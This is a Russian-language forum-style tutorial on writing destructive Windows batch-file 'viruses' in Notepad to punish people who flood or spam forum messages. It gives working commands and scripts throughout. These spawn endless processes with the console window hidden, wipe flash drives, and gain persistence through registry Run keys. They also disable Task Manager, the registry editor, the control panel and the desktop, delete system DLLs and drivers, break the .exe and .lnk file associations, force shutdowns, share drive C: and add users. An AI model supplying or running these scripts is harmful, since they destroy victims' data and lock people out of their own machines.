предупреждаю, за дальнейшие ваши действия и за целостность вашего компа я ответственности не несу.
сегодня мы поговворим о том, как написать вирус и по прикалываться над придурками которые флудят и просят в лс!
вирусо-писание в блокноте.
это один из распространенных вирусо-писаний, и самый легкий. даже сказать, это не совсем вирус. но как вирус лишает пользователя удобств пользования компьютером)мы просто создадим скрипт, который будет выполнять все действия одновременно нагружая компьютер и не только. давайте начнем с простого, чтобы вы поняли, что будет дальше.
1) открываем блокнот;
2) пишем в нем «calc», без кавычек;
3) сохраняем файл под любым именем, но вместо .txt мы напишем .bat
4) откроем файлик и увидим, что открылся калькулятор))
ну что? понимаете к чему я веду? нет? мы будем пользоваться простыми командами виндовс! сейчас я все поясню)
открываем блокнот, пишем:
код:
time 01:01
date 13.12.11
и созраняем в .bat... если запустим, то поменяется время и дата. наверное уже догадались)
ввот еще примерчик:
код:
del f:\ *.* /q
label f:ueban
эта программа, которая удалит ввсе с флешки, если она вставвлена, и переименует ее на ueban
итак мы закончили с написанием простых, безобидных программ...переходим к более жестоким)
код:
:x ;
start calc
goto x ;
угадайте, что сделает эта программа? за 15 секунд она откроет 50 калькуляторов прежде, чем юзер успеет понять, что случилось)) конечно, пока программа ббудет открыввать калькуляторы, будет отображаться черное окошко(командная строка выполнений) если ее закрыть то программа завершится.
чтобы не дать юзеру сделать этого рассмотрим еще 2 новые команды.
новая команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. одним словом, не дадим пользователю увидеть, что случилось. еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку. итак, можно усовершенствовать наш вирус:
код:
@echo off
:x ; >nul
start calc >nul
goto x ; >nul
мдаа комп поввиснет, если программа будет бесконечно открывать калькуляторы.но мы введь можем открывать не толлько калькуляторы! можно запустить и taskmgr(диспетчер задач) можно и mspaint(пэйнт) и так далее...
теперь небольшой перечень того, что можно писать в блокнотовском вирусе.
список:
1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 c:\system.bat);
2) «label x:y» - переименовывает диск x на имя y (пример label c:error);
3) «time х:у» - меняет время на х часов и у минут (пример time 14:27);
4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05);
5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md papka);
6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок);
7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del f:\data*.* /q);
8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3);
9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "smoked" /add);
разберем еще пару жестоких скриптов.
код:
copy ""%0"" "%systemroot%\system32\file.bat"
reg add "hklm\software\microsoft\windows\currentversion\run" /v "filel" /t reg_sz /d "%systemroot%\system32\file.bat" /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer /v nocontrolpanel /t reg_dword /d 1 /f
очень жестокая команда: добавляет программу в автозагрузку ос. не советую проверять на вашем компьютере. не останавливаемся, а едем дальше))
код:
assoc .lnk=.txt >nul
assoc .exe=.mp3 >nul
данными двумя строками мы делаем, весьма тяжелый вред компьютеру жертвы. он меняет расширения всех файлов на компьютере с .lnk в .txt и .exe в .mp3. то есть все ярлыки, открываются в блокноте, а программы, все, в плеере. жеесть да? ну вот и все) всем удачных ввирусо-писаний, пусть нубы познают плату за флуд!
вот самая интересная ...
[*]«taskkill /f /im explorer.exe >nul » – убить процесс explorer.exe , а так же вы можете написать процесс убивающий ...
[*]«taskkill /f /im pb.exe >nul» - убивает пб.ехе)
[*]«reg add hkcusoftwaremicrosoftwindowscurrentversionpolicies system /v disabletaskmgr /t reg_dword /d 1 /f >nul» – запретить комбинацию клавиш ctrl-alt-del
[*]«del "%systemroot%system32*.dll" /q >nul »– удалить все системные dll(динамические загружаемые библиотеки)
[*]«del "%systemroot%driver cachei386driver.cab" /f /q >nul» – удалить все драйверы, установленные на компьютере
[*]«%systemroot%/system32/rundll32 user32, swapmousebutton >nul» – поменять местами значения кнопок мыши
[*]«reg add hkcusoftwaremicrosoftwindowscurrentversionpolicies explorerrestrictrun /v 1 /t reg_dword /d %systemroot%explorer.exe /f >nul» – делает невозможным запуск приложений
[*]«time 0:00 >nul» – поставить время на 00:00
[*]«reg add hkcusoftwaremicrosoftwindowscurrentversionpolicies system /v disableregistrytools /t reg_dword /d 1 /f >nul» – запретить редактирование реестра вручную
[*]«del "%systemroot%cursors*.*" >nul» – удалить курсор мыши
[*]«del "%systemroot%media" /q >nul» – удалить системные звуки windows
[*]«reg add hkcusoftwaremicrosoftwindowscurrentversionpolicies explorer /v nocontrolpanel /t reg_dword /d 1 /f >nul» – запретить вызов панели кправления
[*]«reg add hkcusoftwaremicrosoftwindowscurrentversionpolicies explorer /v nodesktop /t reg_dword /d 1 /f >nul» – убрать рабочий стол
[*]«shutdown -r -t 1 -c "lol" -f >nul» – форсираванная перезагрузка пк
[*]«shutdown -s -t 1 -c "lol" -f >nul» – форсированное выключение пк
[*]«net share "resname"="c:" >nul» – расшарить диск c:
[*]«label c:диск >nul – переименовать диск с:
[*]«msg * "текст сообщения" >nul» – показать windows-стилизованное сообщение с кнопкой ок
[*]«del "%0" >nul» – самоликвидация вируса
если вы не знаете как поменять расширение файлу то делайте так:
заходим в панель управления, заходим в свойства папок-> вкладка "вид". в "дополнительные параметры" убираем галочку с "скрывать расширения для зарегистрированных типов файлов". нажать "ок". теперь выбираем нужный файл, жмём на нём правой кнопкой мыши и выбираем из появившегося меню "переименовать". удаляем расширение (три последних буквы) и пишем новое! жмём "enter" на клавиатуре.
готово!